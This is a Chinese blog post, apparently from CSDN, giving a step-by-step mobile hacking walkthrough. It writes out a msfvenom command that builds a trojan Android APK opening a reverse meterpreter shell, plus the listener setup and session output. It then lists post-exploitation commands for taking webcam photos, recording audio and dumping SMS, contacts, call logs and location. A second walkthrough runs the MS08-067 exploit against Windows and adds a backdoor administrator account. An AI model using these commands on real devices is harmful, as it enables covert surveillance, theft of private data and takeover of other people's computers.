移动端渗透

最新推荐文章于 2024-07-24 10:02:31 发布
最新推荐文章于 2024-07-24 10:02:31 发布
阅读量1.2k 收藏 16
点赞数 2
分类专栏: IS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ftmy_c/article/details/81324706
版权

手机安装KaLi:Android(root权限)+Linux deploy+connectbot+ vnc/rdp远程桌面精灵

运行linux deploy>设置软件语言>发行版本kali/发行版本号sana

ssh ip 127.0.0.1 端口默认22

VNC ip地址127.0.0.1 端口5900

默认账号android 密码changeme

Android远控:DroidJack(配置服务程序/ip/端口)

Kali MSF攻击Android:msf(android/meterpreter)+apk木马

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=5555 R > /root/apk.apk  # 生成apk木马(远程shell代理)

# 设置监听

msf > use exploit/multi/handler

msf exploit(handler) > set payload android/meterpreter/reverse_tcp

payload => android/meterpreter/reverse_tcp

msf exploit(handler) > show option

msf exploit(handler) > set LHOST 192.168.1.16

msf exploit(handler) > set LPORT 5555

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.1.16:5555

[*] Starting the payload handler …

# 目标安装并运行,入侵成功

[*] Sending stage(60790 bytes) to 192.168.1.17

[*] Meterpreter session 1 opend (192.168.1.16:5555 -> 192.168.1.17) at 2016-08-16

# 后续操作

meterpreter > sysinfo  # 查看系统信息

         Computer  : localhost

         OS        : Android 5.1.1 – Linux 4.0.9-android-x86

         Meterpreter : java/android

meterpreter > cd /storage/emulated/0  # 进入文件目录

#控制摄像头:

meterpreter >  webcam_snap -i 1 #前置摄像头拍照截图

meterpreter > webcam_snap -i 1  #后置摄像头拍照截图

[*] Starting…

[+] Got frame

[*] Stopped

Webcam shot saved to: /root/.jpeg

Webcam Commands:1-前置cam  2-后置cam

         record_mic                            Record audio for X seconds

         webcam_chat                        Start a video chat

         webcam_list                          List webcams

         webcam_snap -i 1[2]             Take a snapshot from the specified webcam

         webcam_stream -i 1[2]         Play a video stream from the specified webcam

Android Commands

         check_root          Check if device is rooted

         dump_callog       Get call log

         dump_contacts   Get contacts list

         dump_sms          Get sms messages

         geolocate            Get current lat-long using geolocate

手机kali攻击PC:JuiceSSH+msf + ms08-067

~ msfconsole  # 启动msf

msf > db_status

[*] postgresql connected to msf

#扫描目标信息

msf > use auxiliary/scanner/smb/smb_version

msf auxiliary(smb_version) > show option(set RHOST/LHOST)

msf auxiliary(smb_version) > exploit

#漏洞攻击

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show targets # 漏洞影响的操作系统(可攻击目标)

         Exploit targets:

                   Id Name

                   -- ----

                   0 Automatic Targeting

                   1 Windows 2000 Universal

                   2 Windows 2003 SP0 Universal

                   2 Windows XP SP0/SP1/SP2/SP3

msf exploit(ms08_067_netapi) > show option(set rhost/lhost)

msf exploit(ms08_067_netapi) > exploit -j

msf exploit(ms08_067_netapi) > session -i 1

[*] Starting interaction with 1…

# 后续操作

meterpreter > getuid

[*] Server username : NT AUTHORITY\SYSTEM

meterpreter > sysinfo #Computer/OS/System Language/Domain/Logged on Users信息

meterpreter > net user # 查看登录用户

meterpreter > net user abc abc /add  # 添加用户密码

  meterpreter > net localgroup administrators abc /add  # 设置为管理员权限

meterpreter > net user aa  # 查看aa信息,远程登录GUI

Ftmy
关注
专栏目录
渗透测试之移动端 安卓
信息安全-企业安全-数据安全
09-28 403
渗透测试之移动端,对于安卓,一般使用如下方法进行安全分析,如下表所示: # Adb # https://developer.android.com/studio/command-line/adb?hl=es-419 adb connect IP:PORT/ID adb devices adb shell adb push adb install # Analyze URLs in apk: # https://github.com/shivsahni/APKEnum python APKEnum.py
记我第一次的安卓模拟器安装及配置过程-做移动端渗透测试
lynnez_dd的博客
02-22 2017
安卓模拟器的安装配置相关 1、Genymotion的安装与使用(附百度云盘下载地址,全套都有,无需注册Genymotion即可使用)https://blog.csdn.net/Scythe666/article/details/70216144   途中出现问题: unable to load virtualbox engine 解决方法如下:设置了一下virtualbox 的host-...
移动端渗透测试框架MSF
09-24
移动端渗透测试框架Mobile-Security-Framework-MobSF-master,可以搭建完成后进行移动端渗透测试
渗透测试之移动端常用工具
信息安全-企业安全-数据安全
09-28 510
渗透测试之移动端的常用工具,主要有Frida、Objection、MobSF等,如表所示: Frida https://github.com/frida/frida/releases adb push C:\Users\axff\Downloads\frida-server-12.8.11-android-arm /data/local/tmp/. Objection https://github.com/sensepost/objection MobSF docker pull opensecur
移动端渗透测试解决方案
2301_80127209的博客
07-24 1181
最近在做移动应用方向的渗透测试,实际操作过程中有非常多的麻烦以前是没注意到的,所以今天仔细总结一下有关移动应用的渗透测试一些问题的解决方案。我将从移动应用服务端和客户端(包括Android和ios)进行讲述。
渗透工具包_移动端内网渗透思路_手把手教网安自学路线
2401_84915584的博客
07-09 836
移动端内网渗透思路9/27/2015gandalf一、攻击思路1
移动端应用渗透测试技术白皮书.zip
10-03
移动应用渗透测试技术是保障移动应用安全性的重要手段,它通过模拟黑客攻击行为,发现并修复潜在的安全漏洞。本文将深入探讨这一领域的关键知识点,包括测试背景、测试目标、测试方法、常见漏洞及防范策略。 一、...
APP安卓渗透测试四大步骤
网站安全资讯
07-15 1484
在开始APP安卓端渗透测试时,根据需要制定步骤,并向委托方详细说明需要使用的工具、方法等。具体操作时,会把渗透测试分成三个部分和阶段,不同的角度使区别的方法...
移动端(HTTPS)反抓包手段(主要针对移动端
最新发布
07-26
现在移动端(HTTPS)反抓包手段常见的也就一种,但是其他几种也需要记一下, 1、判断是否有网络代理【几乎不用】或者强制不走网络代理 2、SSL-Pinning【常见】 3、HTTPS双向认证【少见】 4、混淆或者加密数据 5、强制...
移动端安全|Drozer针对Sieve渗透示范
weixin_42282189的博客
12-23 2788
作者: 不染 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 在平时的Android客户端的渗透中,drozer这一工具较为广泛利用,这里就简单介绍以下drozer渗透android客户端的教程。 0x01 环境准备 需要安装Python、Android、Java环境,drozerPC端和agent端(版本须保持一致) 先进行PC端的端口转发,连接drozer服务 adb forward tcp:31415 tcp:31415 //端口转发,连接drozer服.
移动APP渗透测试1之Android基础知识
weixin_44055230的博客
09-23 1336
移动APP渗透测试
安卓渗透服务框架
qq_43710597的博客
12-09 369
在学安卓渗透之前,先找了一家做安卓渗透服务的公司,看看人家都是干嘛的,是怎么做安卓渗透的。然后明确自己的学习方向。 这家公司名叫Blueinfy,以下介绍多源于翻译。 我们都知道,移动应用分两部分组成,一部分在移动设备上,主要负责表示和客户端逻辑,另一个运行在服务器端,主要负责业务逻辑。 对上述两部分进行评估分析,发现可能被攻击者利用的潜在漏洞。这个服务商通过分析应用程序和平台的性质,创建...
移动端渗透测试_入门到放弃
DragonSkyAF的博客
12-26 1472
移动端渗透测试(一) 缺少Native反调试检测 漏洞描述 App没有使用反调试技术对运行时的程序进行保护。攻击者可以通过动态调试的方法,对App进行逆向、跟踪等。同时,攻击者还可以利用调试技术,在运行时的App内存中注入恶意代码,达到截获运行时数据的目的,此举可能导致用户的隐私信息被窃取。 检测步骤 1将root测试机与电脑连接(注意电脑的pp助手需要关闭) 2.在dos窗口中输入adb dev...
渗透测试笔记总结(八)——移动环境渗透
Leon~博客
02-26 673
目录 一、移动的metasploit 二、无线渗透技巧 1、无线口令破解 2、无线AP漏洞渗透 三、无线渗透——笔记本电脑 1、假冒AP攻击 2、加载karma.rc资源文件 四、移动渗透——智能手机 文档截图: ...
PowerOPS—PowerShell的移动渗透测试开发工具
SAKAISON的博客
08-24 1670
PowerOPS能够简化PowerShell的入侵测试流程。该工具包含多个PowerShell攻击模块,使用C#编写无需依赖powershell.exe,但需要在PowerShell运行空间环境(.NET)中执行PowerShell命令。 PowerOPS简化PowerShell使用流程及躲避杀毒检测的原理如下: 1.通过.NET 框架帮助GPO、SRP、App Locke
1. 移动安全渗透测试-(环境搭建)
whyrookie的博客
08-26 311
Santoku 移动渗透测试中的菜刀 下载:http://santoku-linux.com/download/ 预览: 安装JADX 首先需要安装Java8,这里安装为open-jdk8 $ sudo add-apt-repository ppa:openjdk-r/ppa $ sudo apt-get update$ sudo apt-get install openjdk-8-jdk $ sudo update-alternatives --config java $ git c...
5.移动渗透测试工具之drozer
weixin_30483495的博客
01-12 600
本篇博文主要来介绍drozer在移动渗透中的作用 本次实验环境所用工具为:夜神模拟器,drozer-2.3.4,sieve.apk,adb drozer安装这里不再多嘴,给出链接:https://www.cnblogs.com/JDragons/p/5596258.html adb作为移动与pc的调试桥,我这里也已经安装完成。 1.安装agent.apk 在模拟器中运行drozer,...
Android渗透工具drozer安装与使用
tangshuangsss的专栏
09-05 490
移动端渗透测试工具相比丰富的web端真的是少之又少,最近在做app的安全测试,用到了drozer,一款快速识别apk风险点的渗透工具。准备工具Windows10 逍遥安卓模拟器 Pyt...
物联网安全:MQTT渗透测试实战技巧
"物联网安全之mqtt渗透实战.pdf" 物联网安全领域中的MQTT协议是现代设备通信的重要组成部分,特别是在物联网和车联网架构中。MQTT(Message Queuing Telemetry Transport)是一种轻量级的发布/订阅模式的传输协议,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值